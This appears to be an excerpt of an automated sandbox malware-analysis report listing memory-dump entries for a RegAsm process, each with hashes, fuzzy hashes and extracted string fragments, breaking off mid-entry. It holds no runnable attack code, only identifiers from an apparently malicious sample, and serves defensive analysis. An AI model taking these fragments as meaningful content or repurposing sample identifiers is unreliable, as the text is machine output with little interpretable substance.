                                                                  • Instruction ID: e474b29bb85a6c259ff07e14df36c9a08649fe6536d19ea1481a43bd88640b6a
                                                                  • Opcode Fuzzy Hash: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
                                                                  • Instruction Fuzzy Hash: 5D2296B55083509FC700EF59E881A2FBBE0AF95358F488D1DF4D48B262D37AD944CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$4`[b$7654$7654$L]
                                                                  • API String ID: 0-1286059558
                                                                  • Opcode ID: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                  • Instruction ID: 287429e8acf0308d46d64af027b8c2561fec00fe66fe95d8ce0ef9e28d63c3ce
                                                                  • Opcode Fuzzy Hash: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                  • Instruction Fuzzy Hash: DAE1ADB5608344DFE3209F25E881B2FB7E5FB85345F54882DEAC887252DB3AD910CB56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: s$6$H$M|$rF
                                                                  • API String ID: 0-3047902030
                                                                  • Opcode ID: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                  • Instruction ID: afb9f173eede57e33b54f2f4df428e609b2eb683b10d7af656f29c121230f651
                                                                  • Opcode Fuzzy Hash: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                  • Instruction Fuzzy Hash: 40D17B7050C3809BD321DF18D49462FBBE5AB82744F18493EE8D56B392D339D949CBAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #,)$J(Z4
                                                                  • API String ID: 0-1033251941
                                                                  • Opcode ID: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                  • Instruction ID: ee2a4b736eeb26dd3486e01a631b6fd6690cbdf8a78c7fccda172515344799a2
                                                                  • Opcode Fuzzy Hash: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                  • Instruction Fuzzy Hash: E5F1D071604B40CBE7658F35D490BE7BBE2AB4A305F14886ED5EB87282CB39F505CB25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$lk$;9
                                                                  • API String ID: 0-1734778162
                                                                  • Opcode ID: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                  • Instruction ID: c9bf8e021ae438ad3888fe5eaf2f287ab2778ae50bd9558bb26f3a013a9aec5c
                                                                  • Opcode Fuzzy Hash: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                  • Instruction Fuzzy Hash: E002A670608352CBC324DF28E58066BB3E1FF85745F98891EE8C587221E779D914DBAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654$defg
                                                                  • API String ID: 0-754973257
                                                                  • Opcode ID: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                  • Instruction ID: 5c7ae5f1a36bc8351c5dc06062275f31aaba2ea41b8746b841229fb7d44012db
                                                                  • Opcode Fuzzy Hash: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                  • Instruction Fuzzy Hash: C3C1AC716083209BD711EF14E881A2BB7E4EF95354F89095EF8C19B351E339D914CBAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654$f
                                                                  • API String ID: 0-930265988
                                                                  • Opcode ID: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                  • Instruction ID: de19403edc75124fb8fa16651fcd35b7f7b8ffe125996a06d8df55fcce46686f
                                                                  • Opcode Fuzzy Hash: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                  • Instruction Fuzzy Hash: 6E12D1716087419FEB15CF18C880B2FBBE1ABC4314F588A2EF895873A2D739D845CB56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                  • Instruction ID: 4bc0d7d0b4372d09d1f80951b4dd8e72c0f01cae245f05c3a22e09897f17cac6
                                                                  • Opcode Fuzzy Hash: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                  • Instruction Fuzzy Hash: 02122370A08341DFD724CF28E89071ABBE2BF8A316F14896DE4D8973A2D775D904CB56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Inf$NaN
                                                                  • API String ID: 0-3500518849
                                                                  • Opcode ID: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                  • Instruction ID: cfcbd5781c5794fd878052524ebf2c83b7e2996ae9355b3ff982965262b6e72e
                                                                  • Opcode Fuzzy Hash: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                  • Instruction Fuzzy Hash: 7CE1D6B2A083019BC704CF29C48161BBBE5EBC4750F258A3EF899A73D0E774DD458B86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                  • Instruction ID: 97e3d8432fa62b873f2236c54981c5df7dc0733d72ba7613edc951da59989f30
                                                                  • Opcode Fuzzy Hash: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                  • Instruction Fuzzy Hash: D7A122B1904214DBD3219F14CC42BA773B4FF51359F08456EE88A873A2E739EC50C79A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 0-3675246634
                                                                  • Opcode ID: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                  • Instruction ID: 5878a3ae7455ddbe66d1b8aab6ad714c336ee248068d822dee8781cd81fb895b
                                                                  • Opcode Fuzzy Hash: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                  • Instruction Fuzzy Hash: 01D13770A08390DFD720CF24E89075AB7E2AF9A316F18496DE4D997392D375ED04CB1A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 7654$e
                                                                  • API String ID: 2994545307-2460420260
                                                                  • Opcode ID: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                  • Instruction ID: 11945eaa199fbd2feb2a77c93107578b6d38bce28f05eb1bcc10d1619140c484
                                                                  • Opcode Fuzzy Hash: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                  • Instruction Fuzzy Hash: 5AA1F0716083219FD710EF14E8D0A2FB7E1EF95354F94892EE98597352E338E841CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J(Z4$O<>5
                                                                  • API String ID: 0-1381569939
                                                                  • Opcode ID: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                  • Instruction ID: 6565b98a73022d45040d5be856969b21091b835410caec50d7f7389bae59b378
                                                                  • Opcode Fuzzy Hash: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                  • Instruction Fuzzy Hash: 78A17970508B818AE766CF39C050BA3FBE1AF1A305F54585ED4EB8B782C77AB405CB65
                                                                  Strings
                                                                  • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 004376A2
                                                                  • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00437805
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                  • API String ID: 0-2492670020
                                                                  • Opcode ID: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                  • Instruction ID: 6111d259e755e12c00d3ecab6662fed1963f18ecac40f8d090cae3b405bc9ae5
                                                                  • Opcode Fuzzy Hash: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                  • Instruction Fuzzy Hash: 61610573B1D9804BDB3C9A3D4C6226A7A435FDB334B2C936AE5F2C73E1D52988018345
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$;9
                                                                  • API String ID: 0-1035581042
                                                                  • Opcode ID: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                  • Instruction ID: a8d1bfba6cff5693b5a22f2e246a050cfb9519439ae3469259881602220de6ad
                                                                  • Opcode Fuzzy Hash: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                  • Instruction Fuzzy Hash: 24715374108390CBD7208F24D940B6BB7F1FF86305F949A1EE9D987221EB79D810CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,+$;9
                                                                  • API String ID: 0-1035581042
                                                                  • Opcode ID: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                  • Instruction ID: d75497c7bc5a3c3f258d38026d720fbab9c12da0385263baf3a294c8c598bd3d
                                                                  • Opcode Fuzzy Hash: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                  • Instruction Fuzzy Hash: 7E614374108390CBD7248F24E940B6BB7F1FF86305F949A5EE9D887221EB79D810CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: @$MNOP
                                                                  • API String ID: 2994545307-2234187807
                                                                  • Opcode ID: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                  • Instruction ID: 4cbe3da95016eb5cdb85334a5a7d98617c44c4b6d2decb90e9c5df58e2c316ea
                                                                  • Opcode Fuzzy Hash: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                  • Instruction Fuzzy Hash: 773168709093009BE714DF15D880A2BBBF5EF9A319F14892EE98897351D339D914CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %1.17g
                                                                  • API String ID: 0-1551345525
                                                                  • Opcode ID: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                  • Instruction ID: a5a990b7d37f07a136729ee37501cef67c4ba19131cd56b77464573e07893e63
                                                                  • Opcode Fuzzy Hash: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                  • Instruction Fuzzy Hash: 8A12D5B6A08B418BE7158E14C480727BBA2EFE0314F19867ED8596B3D1E779DC05CF4A
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                  • Instruction ID: aaa0f5ddf04a0fb17491854a9ed1dc8b5669499049bb0ea055afc95c03e17e5c
                                                                  • Opcode Fuzzy Hash: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                  • Instruction Fuzzy Hash: 586100B53002149BDB20DB24DC92BB733B4FF81358F564519F9468B390E778E805C76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P
                                                                  • API String ID: 0-3110715001
                                                                  • Opcode ID: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                  • Instruction ID: 3b4be68ae0bb154b0f5282f7702363db0b67a1e70ae851dab57422b1ed72f487
                                                                  • Opcode Fuzzy Hash: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                  • Instruction Fuzzy Hash: DDD1F3729082609FE726CE18D88071FB6E1EB85718F15863DE8B5AB381C779DC06D7C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "
                                                                  • API String ID: 0-123907689
                                                                  • Opcode ID: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                  • Instruction ID: 4bf39b719c747955085c095eee2413a709a75f6ba2d808f9bf0869d59952773e
                                                                  • Opcode Fuzzy Hash: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                  • Instruction Fuzzy Hash: D6C12872A083009BD714CF25C491B6BB7E9AF88354F1C992FE896873A2D738DD44C796
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-3806887055
                                                                  • Opcode ID: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                  • Instruction ID: dda79431a7a381354eb7992f4da0d9bb5ed59ed8d5ad5917760c71f259a4ecc9
                                                                  • Opcode Fuzzy Hash: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                  • Instruction Fuzzy Hash: 0BA11972A087258BC718CF29D89172EB7E2ABC8304F49867DE9969B381DB74DC05C7C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J(Z4
                                                                  • API String ID: 0-2186490230
                                                                  • Opcode ID: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                  • Instruction ID: 0c3c6397971fbf39b577ab5acef299f8a17aa32554bf44bf17e31ec2f091a3f2
                                                                  • Opcode Fuzzy Hash: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                  • Instruction Fuzzy Hash: 2CA16C70408B808AE7768F39C090BE3BBE1AF5A304F54585ED4EB87782D779B445CB29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 4`[b
                                                                  • API String ID: 2994545307-3962175265
                                                                  • Opcode ID: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                  • Instruction ID: 97e95ed95cf941e068c77a71b6c165310a897e915d1a1d564e8b1cc4d5c8788d
                                                                  • Opcode Fuzzy Hash: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                  • Instruction Fuzzy Hash: F191C271A08301AFE720DB15DC81B6FB7E5EB85354F54482EF99897392EB38D840CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                  • Instruction ID: 4c1b4c4b2e9fef75eb940f9395f2579c141d9abd29664ce630b25ef7d8d63037
                                                                  • Opcode Fuzzy Hash: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                  • Instruction Fuzzy Hash: 8B81B1342083059FE724DF29D880A2BB7E5FF95758F15892DE9858B352E738DC10CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                  • Instruction ID: c4d83a5c95ce541db8a93265b5430b6c419164ec9e2e4709dc0e36d878027cf6
                                                                  • Opcode Fuzzy Hash: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                  • Instruction Fuzzy Hash: B381BC306083009BE710DF58D891A2FB7E2FF85744F29886DE5858B361D779EC14CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654
                                                                  • API String ID: 0-4024152101
                                                                  • Opcode ID: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                  • Instruction ID: 7a35ab28fd0a26b3948bf9f86ec2e013bb52480a85e17a240ad3ac06b8b658d9
                                                                  • Opcode Fuzzy Hash: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                  • Instruction Fuzzy Hash: 4371E2716087419FEB15DF19C8C0B2BB7E6EF95314F18892EE99487392D238DC41CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SYA
                                                                  • API String ID: 0-4212776672
                                                                  • Opcode ID: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                  • Instruction ID: 7f879d4623d2c1102999ce86527e4d96d2f3d10b350c70f3ee8129f928f6a44f
                                                                  • Opcode Fuzzy Hash: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                  • Instruction Fuzzy Hash: D761A1B5A00700DFD7259F25E880A63B7F5FB95319F144A3DE08683762E739E885CB89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b
                                                                  • API String ID: 0-3962175265
                                                                  • Opcode ID: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                  • Instruction ID: b495b082d3e908edfd00f2f56cc7232502cc61b4d3337edbb305c0ef107e636d
                                                                  • Opcode Fuzzy Hash: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                  • Instruction Fuzzy Hash: BD514671608340AFE7149E09CC91B2FB7E6EB85725F188A2DF8D957391CA39EC01C796
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7654
                                                                  • API String ID: 0-4024152101
                                                                  • Opcode ID: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                  • Instruction ID: 6b218af450866b0fe99af1f7c51bb86148964a482ba403d1030a703d4783f96c
                                                                  • Opcode Fuzzy Hash: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                  • Instruction Fuzzy Hash: 3851CE742083409BE724DF14E880B2BBBE5EBC5305F18882EE9C997311D739EC10DB2A
                                                                  Strings
                                                                  • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0040E5F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                  • API String ID: 0-2471034898
                                                                  • Opcode ID: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                  • Instruction ID: ccc2d30e64e97e097d375ac0de9d2e22b727f45c33e366729a74f9b94a1f59d5
                                                                  • Opcode Fuzzy Hash: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                  • Instruction Fuzzy Hash: 98514E37A0A5A14BC3244E3E5C112A5AA460BA3334F2D8F77EDF5A73E1D12E4C264399
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-3806887055
                                                                  • Opcode ID: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                  • Instruction ID: 733f38e918fcb2dd5270b8569c0c3cc3d088bc41a3ce343992b8dfccbbb99759
                                                                  • Opcode Fuzzy Hash: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                  • Instruction Fuzzy Hash: BB512C72F147358BC714CE2DD89072AB2D2ABC8305F8A467DDC5A9B382DE349C1587D5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MNOP
                                                                  • API String ID: 0-783613192
                                                                  • Opcode ID: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
